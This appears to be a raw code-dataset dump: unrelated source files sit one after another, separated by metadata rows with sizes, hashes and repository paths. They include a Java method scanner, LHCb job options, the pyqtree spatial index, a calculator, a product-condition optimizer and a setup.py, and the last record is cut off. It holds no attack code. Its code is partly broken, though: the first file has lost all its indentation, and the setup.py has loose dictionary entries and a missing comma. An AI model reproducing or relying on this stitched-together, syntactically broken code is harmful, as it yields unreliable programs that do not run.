# @Author: ZhaoWen <withzhaowen@126.com>
# @Date: 2021/1/2
# @GiteePath: https://gitee.com/openeuler2020/team-1186152014
from method_analysis_utils.scanner import get_scanner,token_type
import os
import logging.config
from method_analysis_utils.complier import get_complier
# 配置日志
logging.config.fileConfig('logging.conf')
logger = logging.getLogger()
def comfig_complier():
'''
装配complier
:return: 返回一个配置好的解析器
'''
c = get_complier()
return c
def config_scanner():
'''
装配scanner
:return: a value named s,type is scanner 返回一个配置好的扫描器
'''
s = get_scanner()
# 初始化对象
s.method_list = []
s.left_single = 0
s.right_single = 0
# 1.方法名 method_name_token [a-zA-Z]+(虽然方法有诸如大驼峰 小驼峰之类的命名规范 但是有可能会有意外)
# 2.方法参数 param_token ^[(][a-zA-Z0-9.png$\s,<A-Z>]+[)] -> (Properties prop1,Properties prop2)
# 3.返回值类型 return_type_token 基本数据类型|自定义对象或者原生的对象|集合|void|泛型 (最简单的方法头一定都会标注返回类型)
# 4.方法花括号 end_token { -> 方法头结束的标志 也是判别一行是否为方法的重要标识
# 判断是否为为访问控制标识符
access_token = token_type("access_token","default|public|protected|private")
# 判断是否为关键字
key_token = token_type("key_token","final|abstract|static|synchronized")
# 判断是否还有下一行
next_token = token_type("next_token","[//]+")
# 判断是否为下一行类别的方法
next_method_token = token_type("next_method_token","([a-zA-Z]+)\).*{")
# 判断是否为必要token
imp_token = token_type("imp_token","(.*)([a-zA-Z]+)(\s){0,}(\(.*\))[a-zA-Z\s]{0,}{")
# 判断是否为无关字符使用代码即可完成 无需再使用正则
invalid_token = token_type("invalid_token",".*")
# 判断是否为接口
interface_token = token_type("interface_token","\s(interface)\s|\s(@interface)\s")
# 是否为类
class_token = token_type("class_token","(class)\s(.*){(.*)")
# 是否为包信息
package_token = token_type("package_token","^package")
# 是否为{
left_single_token = token_type("left_single_token","(.*){(.*)")
# 是否为}
right_single_token = token_type("right_Single_token","(.*)}(.*)")
# {} 同时存在
all_single_token = token_type("all_single_token","(.*)}(.*){(.*)")
token_type_dict = {"access_token":access_token,
"key_token":key_token,
"next_token":next_token,
"next_method_token":next_method_token,
"imp_token":imp_token,
"invalid_token":invalid_token,
"interface_token":interface_token,
"class_token":class_token,
"package_token":package_token,
"left_single_token":left_single_token,
"right_single_token":right_single_token,
"all_single_token":all_single_token
}
s.set_token_type(token_type_dict)
return s
def job_start(path):
'''
API分析工具开始入口
:return: 外部可访问API与外部不可访问API集合
'''
s = config_scanner()
isClass = False
###### 开始扫描源代码 #######
s.read_file(path)
method_list = s.find_method()
# 判断method_list.pop(-1)为True还是False
if method_list.pop(-1):
isClass = True
for m in method_list:
logging.info(m)
logger.info("总共提取到:(" + str(len(method_list)) + ") 行")
else:
logging.info("不是待提取文件")
s.close_file()
###########################
####开始解析提取到的方法头 ####
c = comfig_complier()
# 定义两个列表 一个用来装外部可访问的方法 另一个用来装外部不能访问到的方法
public_list = []
unpublic_list = []
info_list = []
c.complier_start()
for i in method_list:
if type(i) != dict:
if c.complier_method(i):
public_list.append(i)
logger.info("public -> "+i)
else:
unpublic_list.append(i)
logger.info("unpublic -> "+i)
else:
try:
info_list.append(i["package"].replace(";", "").strip())
info_list.append(i["class"].replace("{", "").strip())
except KeyError as e:
logging.info(str(type(e))+"......"+str(e.args))
c.complier_close()
###########################
# 文件类信息 | 外部可访问API列表 | 内部可访问API列表 | 是否为可提取的类文件(非接口文件之类)
return [info_list,public_list,unpublic_list,isClass]
| 28.24
| 96
| 0.581681
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,471
| 0.494596
|
b8014951415d289b10583d9f4dc51aea80536fbd
| 4,905
|
py
|
Python
|
ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py
|
Williams224/davinci-scripts
|
730642d2ff13543eca4073a4ce0932631195de56
|
[
"MIT"
] | null | null | null |
ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py
|
Williams224/davinci-scripts
|
730642d2ff13543eca4073a4ce0932631195de56
|
[
"MIT"
] | null | null | null |
ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py
|
Williams224/davinci-scripts
|
730642d2ff13543eca4073a4ce0932631195de56
|
[
"MIT"
] | null | null | null |
#-- GAUDI jobOptions generated on Mon Jul 20 10:20:49 2015
#-- Contains event types :
#-- 11134011 - 42 files - 900254 events - 251.92 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-125836
#-- StepId : 125836
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08 - Implicit merging.
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-127969
#-- StepId : 127969
#-- StepName : Reco14c for MC - 2012
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p11
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/DST-multipleTCK-2012.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r218
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000001_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000002_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000003_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000004_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000005_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000006_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000007_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000008_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000009_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000010_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000011_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000012_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000013_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000014_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000015_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000016_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000017_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000018_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000019_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000020_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000021_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000022_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000023_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000024_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000025_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000026_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000027_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000029_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000030_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000031_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000032_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000033_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000034_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000035_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000036_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000037_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000038_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000039_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000040_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000041_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000042_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000043_2.AllStreams.dst'
], clear=True)
| 62.088608
| 215
| 0.798777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,685
| 0.955148
|
b801fafbe89ab89d0893778ef60e2212843497d8
| 12,257
|
py
|
Python
|
pyqtree.py
|
GuillemHerrera/Pyqtree
|
4f8491ba543ec26b6bf9272ee3e2f0f455eff259
|
[
"MIT"
] | null | null | null |
pyqtree.py
|
GuillemHerrera/Pyqtree
|
4f8491ba543ec26b6bf9272ee3e2f0f455eff259
|
[
"MIT"
] | null | null | null |
pyqtree.py
|
GuillemHerrera/Pyqtree
|
4f8491ba543ec26b6bf9272ee3e2f0f455eff259
|
[
"MIT"
] | null | null | null |
"""
# Pyqtree
Pyqtree is a pure Python spatial index for GIS or rendering usage.
It stores and quickly retrieves items from a 2x2 rectangular grid area,
and grows in depth and detail as more items are added.
The actual quad tree implementation is adapted from
[Matt Rasmussen's compbio library](https://github.com/mdrasmus/compbio/blob/master/rasmus/quadtree.py)
and extended for geospatial use.
## Platforms
Python 2 and 3.
## Dependencies
Pyqtree is written in pure Python and has no dependencies.
## Installing It
Installing Pyqtree can be done by opening your terminal or commandline and typing:
pip install pyqtree
Alternatively, you can simply download the "pyqtree.py" file and place
it anywhere Python can import it, such as the Python site-packages folder.
## Example Usage
Start your script by importing the quad tree.
from pyqtree import Index
Setup the spatial index, giving it a bounding box area to keep track of.
The bounding box being in a four-tuple: (xmin, ymin, xmax, ymax).
spindex = Index(bbox=(0, 0, 100, 100))
Populate the index with items that you want to be retrieved at a later point,
along with each item's geographic bbox.
# this example assumes you have a list of items with bbox attribute
for item in items:
spindex.insert(item, item.bbox)
Then when you have a region of interest and you wish to retrieve items from that region,
just use the index's intersect method. This quickly gives you a list of the stored items
whose bboxes intersects your region of interests.
overlapbbox = (51, 51, 86, 86)
matches = spindex.intersect(overlapbbox)
There are other things that can be done as well, but that's it for the main usage!
## More Information:
- [Home Page](http://github.com/karimbahgat/Pyqtree)
- [API Documentation](https://karimbahgat.github.io/Pyqtree/)
## License:
This code is free to share, use, reuse, and modify according to the MIT license, see LICENSE.txt.
## Credits:
- Karim Bahgat
- Joschua Gandert
"""
__version__ = "1.0.0"
#PYTHON VERSION CHECK
import sys
PYTHON3 = int(sys.version[0]) == 3
if PYTHON3:
xrange = range
def _normalize_rect(rect):
if len(rect) == 2:
x1, y1 = rect
x2, y2 = rect
else:
x1, y1, x2, y2 = rect
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
return (x1, y1, x2, y2)
def _loopallchildren(parent):
for child in parent.children:
if child.children:
for subchild in _loopallchildren(child):
yield subchild
yield child
class _QuadNode(object):
def __init__(self, item, rect):
self.item = item
self.rect = rect
def __eq__(self, other):
return self.item == other.item and self.rect == other.rect
def __hash__(self):
return hash(self.item)
class _QuadTree(object):
"""
Internal backend version of the index.
The index being used behind the scenes. Has all the same methods as the user
index, but requires more technical arguments when initiating it than the
user-friendly version.
"""
def __init__(self, x, y, width, height, max_items, max_depth, _depth=0, fid=0):
self.nodes = []
self.children = []
self.center = (x, y)
self.width, self.height = width, height
self.max_items = max_items
self.max_depth = max_depth
self._depth = _depth
self.fid = fid
def __iter__(self):
for child in _loopallchildren(self):
yield child
def _insert(self, item, bbox):
rect = _normalize_rect(bbox)
if len(self.children) == 0:
node = _QuadNode(item, rect)
self.nodes.append(node)
if len(self.nodes) > self.max_items and self._depth < self.max_depth:
self._split()
else:
self._insert_into_children(item, rect)
def _remove(self, item, bbox):
rect = _normalize_rect(bbox)
if len(self.children) == 0:
node = _QuadNode(item, rect)
self.nodes.remove(node)
else:
self._remove_from_children(item, rect)
def _intersect(self, rect, results=None, uniq=None):
if results is None:
rect = _normalize_rect(rect)
results = []
uniq = set()
# search children
if self.children:
if rect[0] <= self.center[0]:
if rect[1] <= self.center[1]:
self.children[0]._intersect(rect, results, uniq)
if rect[3] >= self.center[1]:
self.children[1]._intersect(rect, results, uniq)
if rect[2] >= self.center[0]:
if rect[1] <= self.center[1]:
self.children[2]._intersect(rect, results, uniq)
if rect[3] >= self.center[1]:
self.children[3]._intersect(rect, results, uniq)
# search node at this level
for node in self.nodes:
_id = id(node.item)
if (_id not in uniq and
node.rect[2] >= rect[0] and node.rect[0] <= rect[2] and
node.rect[3] >= rect[1] and node.rect[1] <= rect[3]):
results.append(node.item)
uniq.add(_id)
return results
def _insert_into_children(self, item, rect):
# if rect spans center then insert here
if (rect[0] <= self.center[0] and rect[2] >= self.center[0] and
rect[1] <= self.center[1] and rect[3] >= self.center[1]):
node = _QuadNode(item, rect)
self.nodes.append(node)
else:
# try to insert into children
if rect[0] <= self.center[0]:
if rect[1] <= self.center[1]:
self.children[0]._insert(item, rect)
if rect[3] >= self.center[1]:
self.children[1]._insert(item, rect)
if rect[2] > self.center[0]:
if rect[1] <= self.center[1]:
self.children[2]._insert(item, rect)
if rect[3] >= self.center[1]:
self.children[3]._insert(item, rect)
def _remove_from_children(self, item, rect):
# if rect spans center then insert here
if (rect[0] <= self.center[0] and rect[2] >= self.center[0] and
rect[1] <= self.center[1] and rect[3] >= self.center[1]):
node = _QuadNode(item, rect)
self.nodes.remove(node)
else:
# try to remove from children
if rect[0] <= self.center[0]:
if rect[1] <= self.center[1]:
self.children[0]._remove(item, rect)
if rect[3] >= self.center[1]:
self.children[1]._remove(item, rect)
if rect[2] > self.center[0]:
if rect[1] <= self.center[1]:
self.children[2]._remove(item, rect)
if rect[3] >= self.center[1]:
self.children[3]._remove(item, rect)
def _split(self):
quartwidth = self.width / 4.0
quartheight = self.height / 4.0
halfwidth = self.width / 2.0
halfheight = self.height / 2.0
x1 = self.center[0] - quartwidth
x2 = self.center[0] + quartwidth
y1 = self.center[1] - quartheight
y2 = self.center[1] + quartheight
new_depth = self._depth + 1
self.children = [_QuadTree(x1, y1, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}3'),
_QuadTree(x1, y2, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}0'),
_QuadTree(x2, y1, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}2'),
_QuadTree(x2, y2, halfwidth, halfheight,
self.max_items, self.max_depth, new_depth, f'{self.fid}1')]
nodes = self.nodes
self.nodes = []
for node in nodes:
self._insert_into_children(node.item, node.rect)
def __len__(self):
"""
Returns:
- A count of the total number of members/items/nodes inserted
into this quadtree and all of its child trees.
"""
size = 0
for child in self.children:
size += len(child)
size += len(self.nodes)
return size
MAX_ITEMS = 10
MAX_DEPTH = 20
class Index(_QuadTree):
"""
The top spatial index to be created by the user. Once created it can be
populated with geographically placed members that can later be tested for
intersection with a user inputted geographic bounding box. Note that the
index can be iterated through in a for-statement, which loops through all
all the quad instances and lets you access their properties.
Example usage:
>>> spindex = Index(bbox=(0, 0, 100, 100))
>>> spindex.insert('duck', (50, 30, 53, 60))
>>> spindex.insert('cookie', (10, 20, 15, 25))
>>> spindex.insert('python', (40, 50, 95, 90))
>>> results = spindex.intersect((51, 51, 86, 86))
>>> sorted(results)
['duck', 'python']
"""
def __init__(self, bbox=None, x=None, y=None, width=None, height=None, max_items=MAX_ITEMS, max_depth=MAX_DEPTH):
"""
Initiate by specifying either 1) a bbox to keep track of, or 2) with an xy centerpoint and a width and height.
Parameters:
- **bbox**: The coordinate system bounding box of the area that the quadtree should
keep track of, as a 4-length sequence (xmin,ymin,xmax,ymax)
- **x**:
The x center coordinate of the area that the quadtree should keep track of.
- **y**
The y center coordinate of the area that the quadtree should keep track of.
- **width**:
How far from the xcenter that the quadtree should look when keeping track.
- **height**:
How far from the ycenter that the quadtree should look when keeping track
- **max_items** (optional): The maximum number of items allowed per quad before splitting
up into four new subquads. Default is 10.
- **max_depth** (optional): The maximum levels of nested subquads, after which no more splitting
occurs and the bottommost quad nodes may grow indefinately. Default is 20.
"""
if bbox is not None:
x1, y1, x2, y2 = bbox
width, height = abs(x2-x1), abs(y2-y1)
midx, midy = x1+width/2.0, y1+height/2.0
super(Index, self).__init__(midx, midy, width, height, max_items, max_depth)
elif None not in (x, y, width, height):
super(Index, self).__init__(x, y, width, height, max_items, max_depth)
else:
raise Exception("Either the bbox argument must be set, or the x, y, width, and height arguments must be set")
def insert(self, item, bbox):
"""
Inserts an item into the quadtree along with its bounding box.
Parameters:
- **item**: The item to insert into the index, which will be returned by the intersection method
- **bbox**: The spatial bounding box tuple of the item, with four members (xmin,ymin,xmax,ymax)
"""
self._insert(item, bbox)
def remove(self, item, bbox):
"""
Removes an item from the quadtree.
Parameters:
- **item**: The item to remove from the index
- **bbox**: The spatial bounding box tuple of the item, with four members (xmin,ymin,xmax,ymax)
Both parameters need to exactly match the parameters provided to the insert method.
"""
self._remove(item, bbox)
def intersect(self, bbox):
"""
Intersects an input boundingbox rectangle with all of the items
contained in the quadtree.
Parameters:
- **bbox**: A spatial bounding box tuple with four members (xmin,ymin,xmax,ymax)
Returns:
- A list of inserted items whose bounding boxes intersect with the input bbox.
"""
return self._intersect(bbox)
| 34.821023
| 121
| 0.59566
| 9,635
| 0.786081
| 282
| 0.023007
| 0
| 0
| 0
| 0
| 5,545
| 0.452395
|
b8028a1a0d82b7861ade532f7556efe716f52f14
| 1,136
|
py
|
Python
|
Day10/calci.py
|
viditvarshney/100DaysOfCode
|
eec82c98087093f1aec1cb21acab82368ae785a3
|
[
"MIT"
] | null | null | null |
Day10/calci.py
|
viditvarshney/100DaysOfCode
|
eec82c98087093f1aec1cb21acab82368ae785a3
|
[
"MIT"
] | null | null | null |
Day10/calci.py
|
viditvarshney/100DaysOfCode
|
eec82c98087093f1aec1cb21acab82368ae785a3
|
[
"MIT"
] | null | null | null |
from logo import logo
def add(n1, n2):
return n1 + n2
def multiply(n1, n2):
return n1 * n2
def subtract(n1, n2):
return n1 - n2
def divide(n1, n2):
return n1 / n2
symbols = ['+', '-', '/', '*']
operations = {'+': add, '-': subtract,
'*': multiply, '/': divide}
def Calci():
print(logo)
num1 = float(input("Enter 1st number: "))
for key in operations:
print(key)
while True:
choice = input("Choose an operation: ")
if not choice in symbols:
print("WARNING! Invalid Operation symbol: ")
break
num2 = float(input("Enter next number: "))
calculation_func = operations[choice]
result = calculation_func(num1, num2)
print(f"{num1} {choice} {num2} = {result}")
clear = input(
f"Type 'y to continue with {result} or 'new' to start a new calculation 'n' to exit: ")
if clear.casefold() == 'y':
num1 = result
elif clear.casefold() == 'new':
Calci()
else:
print(f"Your final result is: {result}")
break
Calci()
| 21.037037
| 100
| 0.529049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.254401
|
b805c6c952721423e773c7922c3d8b331193cf4b
| 6,089
|
py
|
Python
|
shoptimizer_api/optimizers_builtin/condition_optimizer.py
|
leozz37/shoptimizer
|
a940306cba4040e9d69e1ae2ce077c2a6a108c1f
|
[
"Apache-2.0"
] | null | null | null |
shoptimizer_api/optimizers_builtin/condition_optimizer.py
|
leozz37/shoptimizer
|
a940306cba4040e9d69e1ae2ce077c2a6a108c1f
|
[
"Apache-2.0"
] | null | null | null |
shoptimizer_api/optimizers_builtin/condition_optimizer.py
|
leozz37/shoptimizer
|
a940306cba4040e9d69e1ae2ce077c2a6a108c1f
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""A module for Shoptimizer API that fixes invalid condition values.
Reference: https://support.google.com/merchants/answer/6324469
If the condition field is specified as "new", but other fields in the
product imply that the condition is otherwise, this optimizer will reset
the condition value to "used".
"""
import logging
from typing import Any, Dict, List, Set
from flask import current_app
from optimizers_abstract import base_optimizer
_NEW = 'new'
_USED = 'used'
class ConditionOptimizer(base_optimizer.BaseOptimizer):
"""An optimizer that fixes invalidly-set condition fields."""
_OPTIMIZER_PARAMETER = 'condition-optimizer'
_condition_config = None
def _optimize(self, product_batch: Dict[str, Any], language: str,
country: str, currency: str) -> int:
"""Runs the optimization.
Fixes invalid condition values.
See above for the definition of an invalid condition value.
Args:
product_batch: A batch of product data.
language: The language to use for this optimizer.
country: The country to use for this optimizer.
currency: The currency to use for this optimizer.
Returns:
The number of products affected by this optimization.
"""
num_of_products_optimized = 0
self._condition_config = current_app.config.get('CONFIGS', {}).get(
f'condition_optimizer_config_{language}', {})
for entry in product_batch['entries']:
product = entry['product']
google_product_category = product.get('googleProductCategory', '')
if self._is_google_product_category_excluded(google_product_category):
logging.info(
'Product ID: %s With Category %s was flagged for exclusion '
' of the condition check', product.get('offerId', ''),
google_product_category)
continue
used_tokens = set(
token.lower() for token in self._condition_config['used_tokens'])
logging.info('Used tokens were %s', used_tokens)
if product.get('condition', '') == _NEW:
# Category format must follow the official spec to be converted a list.
# Ref: https://support.google.com/merchants/answer/6324436?hl=en.
product_categories = google_product_category.split(' > ')
if isinstance(product_categories, list) and product_categories:
lowest_level_category = product_categories[-1]
category_specific_tokens = self._get_tokens_for_category(
lowest_level_category)
if category_specific_tokens:
category_specific_tokens = set(
token.lower() for token in category_specific_tokens)
used_tokens.update(category_specific_tokens)
# Search for used tokens in both title and description and reset the
# condition to used if any were detected.
product_title = product.get('title', '')
product_description = product.get('description', '')
if self._field_contains_used_tokens(
product_title, used_tokens) or self._field_contains_used_tokens(
product_description, used_tokens):
product['condition'] = _USED
logging.info('Modified item %s: Setting new product to used.',
product.get('offerId', ''))
num_of_products_optimized += 1
base_optimizer.set_optimization_tracking(product,
base_optimizer.SANITIZED)
return num_of_products_optimized
def _is_google_product_category_excluded(
self, google_product_category: str) -> bool:
"""Checks if the provided category was found in the exclusions config dict.
Args:
google_product_category: A string representing the product category.
Returns:
True if the given category was found in the condition config's list of
categories to exclude from being optimized for condition due to those
categories being at higher risk of containing false-positives.
"""
excluded_categories = self._condition_config.get(
'excluded_product_categories', [])
# Ensure that the exclude category from the config matches the product's
# category from the beginning of the string in order to support an entire
# category family being matched, as well as enforcing avoidance of unrelated
# matches if only a sub-category was specified.
return any(
google_product_category.startswith(category_to_exclude)
for category_to_exclude in excluded_categories)
def _field_contains_used_tokens(self, field_text: str,
used_tokens: Set[str]) -> bool:
"""Checks if the provided field contains any terms in the given set.
Args:
field_text: A string representing the value of a product field.
used_tokens: A set representing used condition indicators.
Returns:
True if any term was found in the target product field, otherwise False.
"""
return any(token in field_text.lower() for token in used_tokens)
def _get_tokens_for_category(self, product_category: str) -> List[str]:
"""Gets the values in a list of dictionaries if the provided category was found.
Args:
product_category: The product's lowest-level category.
Returns:
A list of the tokens of the matching category, or an empty list.
"""
category_mappings = self._condition_config['target_product_categories']
return category_mappings.get(product_category, [])
| 40.059211
| 84
| 0.702414
| 5,010
| 0.822795
| 0
| 0
| 0
| 0
| 0
| 0
| 3,288
| 0.53999
|
b805e135095833b9aacb9e146ceaa3844c6781fb
| 670
|
py
|
Python
|
setup.py
|
comradepopo/p4rmyknife
|
e34a12a86cc090e3add25dc5baa7f6629586a4c6
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
comradepopo/p4rmyknife
|
e34a12a86cc090e3add25dc5baa7f6629586a4c6
|
[
"Apache-2.0"
] | 1
|
2019-10-18T23:10:11.000Z
|
2019-10-18T23:10:11.000Z
|
setup.py
|
comradepopo/p4rmyknife
|
e34a12a86cc090e3add25dc5baa7f6629586a4c6
|
[
"Apache-2.0"
] | null | null | null |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
'description': 'P4rmyKnife - The Swiss Army Knife for P4',
'author': 'Assembla, Inc.',
'url': 'https://assembla.com/'
'author_email': 'louis@assembla.com',
'version': '0.1',
'install_requires': [],
'packages': ['p4rmyknife'],
'scripts': [],
'name': 'p4rmyknife'
setup(name='p4rmyknife',
description='P4rmyKnife - The Swiss Army Knife for P4',
author='Assembla, Inc.',
url='https://assembla.com/'
author_email='louis@assembla.com',
version='0.1',
install_requires=[],
packages=['p4rmyknife'],
scripts=[]
)
| 25.769231
| 62
| 0.626866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 352
| 0.525373
|
b807feaa7b46fd15709c8ce5d95d9ec7f33de619
| 446
|
py
|
Python
|
utilities/readProperties.py
|
harry-100/qa-automation-framework
|
5fbe03e930820537e53f2d26b1c2b2bd2b222bf5
|
[
"MIT"
] | null | null | null |
utilities/readProperties.py
|
harry-100/qa-automation-framework
|
5fbe03e930820537e53f2d26b1c2b2bd2b222bf5
|
[
"MIT"
] | null | null | null |
utilities/readProperties.py
|
harry-100/qa-automation-framework
|
5fbe03e930820537e53f2d26b1c2b2bd2b222bf5
|
[
"MIT"
] | null | null | null |
from configparser import RawConfigParser
config = RawConfigParser()
config.read("configuration/config.ini")
class ReadConfig():
@staticmethod
def getApplicationURL():
url = (config.get('common info', 'baseURL'))
return url
@staticmethod
def getUserName():
username = (config.get('common info', 'username'))
return username
@staticmethod
def getPassword():
password = (config.get('common info', 'password'))
return password
| 20.272727
| 52
| 0.7287
| 334
| 0.748879
| 0
| 0
| 307
| 0.688341
| 0
| 0
| 94
| 0.210762
|
b80bab1732354a9bf5c8b8066aa6d633362ec4a1
| 181
|
py
|
Python
|
tinyq/__init__.py
|
mozillazg/tinyq
|
fd9ecc593931c9b315c4aeb9150389b3e4ae670e
|
[
"MIT"
] | 14
|
2017-08-02T23:30:16.000Z
|
2021-05-31T19:58:29.000Z
|
tinyq/__init__.py
|
mozillazg/tinyq
|
fd9ecc593931c9b315c4aeb9150389b3e4ae670e
|
[
"MIT"
] | null | null | null |
tinyq/__init__.py
|
mozillazg/tinyq
|
fd9ecc593931c9b315c4aeb9150389b3e4ae670e
|
[
"MIT"
] | 2
|
2017-03-13T09:36:05.000Z
|
2017-10-27T14:33:48.000Z
|
# -*- coding: utf-8 -*-
from tinyq.app import Application # noqa
__version__ = '0.3.0'
__author__ = 'mozillazg'
__license__ = 'MIT'
__copyright__ = 'Copyright (c) 2017 mozillazg'
| 22.625
| 46
| 0.696133
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 82
| 0.453039
|
b80bd1236784afca06c2fdaedb154f5764c38921
| 258
|
py
|
Python
|
henrietta/tests/__init__.py
|
zkbt/henrietta
|
653d798b241ad5591b704967a0413a2457a4e734
|
[
"MIT"
] | null | null | null |
henrietta/tests/__init__.py
|
zkbt/henrietta
|
653d798b241ad5591b704967a0413a2457a4e734
|
[
"MIT"
] | 12
|
2018-09-12T03:56:04.000Z
|
2019-02-15T04:12:53.000Z
|
henrietta/tests/__init__.py
|
zkbt/henrietta
|
653d798b241ad5591b704967a0413a2457a4e734
|
[
"MIT"
] | null | null | null |
from .test_lightcurves import *
from .test_statistics import *
from .test_models import *
from .test_fitting import *
from .test_tools import *
from .test_photometry import *
from .test_tpf import *
from .test_imaging import *
from .test_photometry import *
| 25.8
| 31
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b80c3a78699daca713934719586192ebb12c7028
| 340
|
py
|
Python
|
personas.py
|
Ulzahk/Practica-Python-CRUD
|
